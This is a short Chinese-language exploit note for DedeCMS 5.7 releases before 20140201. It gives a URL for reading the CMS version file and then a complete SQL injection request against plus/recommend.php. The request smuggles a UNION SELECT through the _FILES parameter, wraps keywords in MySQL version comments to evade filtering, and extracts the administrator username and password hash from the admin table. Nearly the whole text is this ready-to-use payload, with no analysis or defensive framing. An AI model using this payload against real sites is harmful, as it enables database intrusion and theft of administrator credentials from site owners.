http://127.0.0.1/data/admin/ver.txt 查看CMS版本号
DedeCMS 20140201之前5.7通杀注入漏洞
http://127.0.0.1/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c416e6d336e796d6f757353656344656465436d73526563496e6a7c,pwd)%20from%20`%23@__admin`%20limit%200,1),5,6,7,8,9%23@`\%27`%20&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=3301